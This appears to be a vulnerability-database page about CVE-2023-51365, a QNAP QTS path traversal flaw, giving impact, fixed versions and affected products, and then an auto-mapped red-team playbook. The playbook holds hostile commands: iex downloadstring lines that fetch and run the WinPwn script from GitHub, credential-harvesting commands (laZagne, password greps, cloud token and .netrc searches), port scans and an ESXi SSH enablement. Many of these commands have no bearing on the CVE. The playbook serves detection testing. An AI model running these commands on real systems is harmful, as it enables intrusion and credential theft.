CVE-2023-51365
Overview
This vulnerability is a path traversal flaw rooted in insufficient validation of user-supplied file path inputs within QNAP QTS operating system components. The affected component improperly sanitizes or restricts directory traversal sequences, enabling unauthorized access to filesystem locations outside intended directories. This flaw exists in multiple QNAP OS versions, including QTS, QuTS hero, and QuTScloud variants, impacting their file access controls.
Vulnerability Description
A path traversal vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow users to read the contents of unexpected files and expose sensitive data via a network. We have already fixed the vulnerability in the following versions: QTS 5.1.4.2596 build 20231128 and later QTS 4.5.4.2627 build 20231225 and later QuTS hero h5.1.3.2578 build 20231110 and later QuTS hero h4.5.4.2626 build 20231225 and later QuTScloud c5.1.5.2651 and later
Impact
An unauthenticated remote attacker with network access can exploit this vulnerability to read arbitrary files on the affected QNAP device, potentially exposing sensitive configuration or credential data. This can facilitate further compromise or data leakage within the environment. The attack requires no user interaction and leverages network access, as indicated by the CVSS vector AV:N/AC:H/PR:N/UI:N. The impact includes unauthorized information disclosure and potential escalation of subsequent attacks against the system or network.
Solution
QNAP has released fixed versions addressing this vulnerability: QTS 5.1.4.2596 build 20231128 and later, QTS 4.5.4.2627 build 20231225 and later, QuTS hero h5.1.3.2578 build 20231110 and later, QuTS hero h4.5.4.2626 build 20231225 and later, and QuTScloud c5.1.5.2651 and later. Administrators should upgrade affected systems to these versions promptly. Detailed patch instructions and advisory information are available at QNAP's official security advisory: https://www.qnap.com/en/security-advisory/qsa-24-14.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
A path traversal vulnerability has been identified in several versions of QNAP's operating system, which allows an attacker to manipulate file paths to access files outside of the intended directory structure. This flaw arises from improper validation of user-supplied input, enabling a malicious actor to craft requests that traverse the file system. By exploiting this vulnerability, an attacker can potentially read sensitive files, including configuration files, user credentials, and other critical data that should remain protected. The impact of this vulnerability is exacerbated by the fact that QNAP devices are often used in environments where sensitive data is stored, making them attractive targets for cybercriminals.
The primary attack vector for this vulnerability involves sending specially crafted HTTP requests to the affected QNAP devices. An attacker could leverage this flaw remotely, without needing physical access to the device. For instance, by manipulating the URL parameters in a web request, an attacker could navigate to directories that are not intended to be accessible, thereby gaining unauthorized access to sensitive files. This could lead to further exploitation, such as credential theft, unauthorized data access, or even lateral movement within a network if sensitive information is used to compromise additional systems.
The real-world implications of this vulnerability are significant, particularly for organizations that rely on QNAP devices for data storage and management. The exposure of sensitive data could lead to severe business risks, including financial losses, reputational damage, and legal ramifications due to non-compliance with data protection regulations. For instance, if personal data or proprietary business information is accessed and exfiltrated, it could result in data breaches that attract regulatory scrutiny and potential fines. Furthermore, the trust of customers and partners could be undermined, leading to long-term damage to the organization's reputation.
To detect and mitigate this vulnerability, organizations should prioritize updating their QNAP devices to the latest versions that have addressed the flaw. Regularly applying security patches is crucial to maintaining the integrity of the system. Additionally, implementing network segmentation can help limit exposure by restricting access to sensitive devices and data. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of exploitation attempts. Organizations should consider employing web application firewalls (WAFs) to filter and monitor HTTP requests, blocking those that exhibit signs of path traversal attempts.
In conclusion, the path traversal vulnerability in QNAP operating systems presents a serious threat to data security and organizational integrity. The ability for an attacker to access sensitive files remotely underscores the importance of robust security practices, including timely updates and proactive monitoring. Organizations must remain vigilant and adopt a comprehensive approach to cybersecurity, ensuring that they not only address known vulnerabilities but also foster a culture of security awareness among their employees. By doing so, they can significantly reduce the risk of exploitation and protect their valuable data assets.
Affected Products (9)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Qnap | Qts | All |
cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
|
|
|
Qnap | Qts | All |
cpe:2.3:o:qnap:qts:*:*:*:*:*:*:*:*
|
|
|
Qnap | Qts | 4.5.4.2627 |
cpe:2.3:o:qnap:qts:4.5.4.2627:-:*:*:*:*:*:*
|
|
|
Qnap | Qts | 5.1.4.2596 |
cpe:2.3:o:qnap:qts:5.1.4.2596:-:*:*:*:*:*:*
|
|
|
Qnap | Quts Hero | All |
cpe:2.3:o:qnap:quts_hero:*:*:*:*:*:*:*:*
|
|
|
Qnap | Quts Hero | All |
cpe:2.3:o:qnap:quts_hero:*:*:*:*:*:*:*:*
|
|
|
Qnap | Quts Hero | h4.5.4.2626 |
cpe:2.3:o:qnap:quts_hero:h4.5.4.2626:-:*:*:*:*:*:*
|
|
|
Qnap | Quts Hero | h5.1.3.2578 |
cpe:2.3:o:qnap:quts_hero:h5.1.3.2578:-:*:*:*:*:*:*
|
|
|
Qnap | Qutscloud | All |
cpe:2.3:o:qnap:qutscloud:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-51365 |
| qnap.com |
GitHub CVE
|
https://www.qnap.com/en/security-advisory/qsa-24-14 |